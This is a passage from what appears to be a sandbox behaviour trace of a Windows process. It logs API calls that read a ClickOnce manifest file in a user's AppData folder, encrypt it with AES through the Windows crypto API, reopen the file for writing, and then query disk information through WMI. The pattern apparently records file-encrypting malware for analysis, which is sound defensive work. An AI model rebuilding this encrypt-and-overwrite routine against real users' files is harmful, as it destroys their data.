ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x354b)) returned 1 [0161.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0161.269] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", lpFilePart=0x0) returned 0xa6 [0161.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0161.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0161.270] GetFileType (hFile=0x4d0) returned 0x1 [0161.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0161.270] GetFileType (hFile=0x4d0) returned 0x1 [0161.270] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x354b [0161.270] ReadFile (in: hFile=0x4d0, lpBuffer=0x369fd5c, nNumberOfBytesToRead=0x354b, lpNumberOfBytesRead=0x949ea9c, lpOverlapped=0x0 | out: lpBuffer=0x369fd5c*, lpNumberOfBytesRead=0x949ea9c*=0x354b, lpOverlapped=0x0) returned 1 [0161.273] CloseHandle (hObject=0x4d0) returned 1 [0161.273] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0xbe0030) returned 1 [0161.274] CryptGenRandom (in: hProv=0xbe0030, dwLen=0x10, pbBuffer=0x36a396c | out: pbBuffer=0x36a396c) returned 1 [0162.124] CryptImportKey (in: hProv=0xbe0030, pbData=0x3827d68, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7f490) returned 1 [0162.124] CryptContextAddRef (hProv=0xbe0030, pdwReserved=0x0, dwFlags=0x0) returned 1 [0162.124] CryptContextAddRef (hProv=0xbe0030, pdwReserved=0x0, dwFlags=0x0) returned 1 [0162.124] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7f510) returned 1 [0162.124] CryptContextAddRef (hProv=0xbe0030, pdwReserved=0x0, dwFlags=0x0) returned 1 [0162.124] CryptSetKeyParam (hKey=0xb7f510, dwParam=0x4, pbData=0x3827e48*=0x1, dwFlags=0x0) returned 1 [0162.124] CryptSetKeyParam (hKey=0xb7f510, dwParam=0x1, pbData=0x3827e14, dwFlags=0x0) returned 1 [0162.125] CryptEncrypt (in: hKey=0xb7f510, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3827e58*, pdwDataLen=0x949ea68*=0x3550, dwBufLen=0x3550 | out: pbData=0x3827e58*, pdwDataLen=0x949ea68*=0x3550) returned 1 [0162.125] CryptEncrypt (in: hKey=0xb7f510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x382b3cc*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x382b3cc*, pdwDataLen=0x949ea70*=0x10) returned 1 [0162.127] CryptDestroyKey (hKey=0xb7f490) returned 1 [0162.127] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0162.127] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0162.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", lpFilePart=0x0) returned 0xa6 [0162.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0162.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0162.128] GetFileType (hFile=0x45c) returned 0x1 [0162.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0162.129] GetFileType (hFile=0x45c) returned 0x1 [0162.129] WriteFile (in: hFile=0x45c, lpBuffer=0x382badc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x382badc*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0162.130] CloseHandle (hObject=0x45c) returned 1 [0162.131] CoTaskMemAlloc (cb=0x20c) returned 0xbe2e58 [0162.131] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe2e58 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0162.131] CoTaskMemFree (pv=0xbe2e58) [0162.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0162.131] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0162.131] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0162.131] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0162.131] IUnknown:Release (This=0xb51e34) returned 0x1 [0162.495] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x6027650) returned 0x0 [0162.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0162.495] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027650, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x6030940) returned 0x0 [0162.496] WbemDefPath:IUnknown:Release (This=0x6027650) returned 0x0 [0162.496] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x6030940) returned 0x0 [0162.496] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0162.496] WbemDefPath:IUnknown:AddRef (This=0x6030940) returned 0x3 [0162.496] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0162.496] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0162.496] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0xbdf070) returned 0x0 [0162.496] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf070, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0162.496] WbemDefPath:IUnknown:Release (This=0xbdf070) returned 0x3 [0162.496] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0162.496] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0162.496] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0162.496] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x2 [0162.496] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x1 [0162.496] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0162.496] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0162.496] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x6030940) returned 0x0 [0162.496] WbemDefPath:IUnknown:AddRef (This=0x6030940) returned 0x3 [0162.497] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x2 [0162.497] WbemDefPath:IWbemPath:SetText (This=0x6030940, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030940, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030940, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030940, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0162.497] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0162.497] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0162.497] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0162.497] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0162.497] IUnknown:Release (This=0xb51e34) returned 0x1 [0162.498] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x6027670) returned 0x0 [0162.498] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027670, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0162.498] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027670, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x60309b0) returned 0x0 [0162.498] WbemDefPath:IUnknown:Release (This=0x6027670) returned 0x0 [0162.498] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x60309b0) returned 0x0 [0162.499] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0162.499] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0162.499] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0162.499] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 [0162.499] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0xbb5838) returned 0x0 [0162.499] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5838, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0162.499] WbemDefPath:IUnknown:Release (This=0xbb5838) returned 0x3 [0162.499] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0162.499] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0162.499] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0162.499] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0162.499] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0162.499] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0162.499] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0162.499] WbemDefPath:IUnknown:QueryInterface (in: This=0x60309b0, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x60309b0) returned 0x0 [0162.499] WbemDefPath:IUnknown:AddRef (This=0x60309b0) returned 0x3 [0162.499] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x2 [0162.499] WbemDefPath:IWbemPath:SetText (This=0x60309b0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0162.500] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0162.500] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0162.500] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0162.500] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0162.500] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: pAptType=0x949e978*=1) returned 0x0 [0162.500] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0162.500] IUnknown:Release (This=0xb51e34) returned 0x1 [0162.501] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x601f660) returned 0x0 [0162.501] WbemLocator:IUnknown:QueryInterface (in: This=0x601f660, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0162.501] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f660, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x6027680) returned 0x0 [0162.501] WbemLocator:IUnknown:Release (This=0x601f660) returned 0x0 [0162.501] WbemLocator:IUnknown:QueryInterface (in: This=0x6027680, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x6027680) returned 0x0 [0162.501] WbemLocator:IUnknown:QueryInterface (in: This=0x6027680, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0162.501] WbemLocator:IUnknown:AddRef (This=0x6027680) returned 0x3 [0162.501] WbemLocator:IUnknown:QueryInterface (in: This=0x6027680, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0162.501] WbemLocator:IUnknown:QueryInterface (in: This=0x6027680, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0162.501] WbemLocator:IUnknown:QueryInterface (in: This=0x6027680, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0162.501] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0162.501] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0162.501] WbemLocator:IUnknown:QueryInterface (in: This=0x6027680, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0162.501] WbemLocator:IUnknown:Release (This=0x6027680) returned 0x2 [0162.501] WbemLocator:IUnknown:Release (This=0x6027680) returned 0x1 [0162.502] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0162.502] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0162.502] WbemLocator:IUnknown:QueryInterface (in: This=0x6027680, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x6027680) returned 0x0 [0162.502] WbemLocator:IUnknown:AddRef (This=0x6027680) returned 0x3 [0162.502] WbemLocator:IUnknown:Release (This=0x6027680) returned 0x2 [0162.502] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0162.502] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0162.502] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, 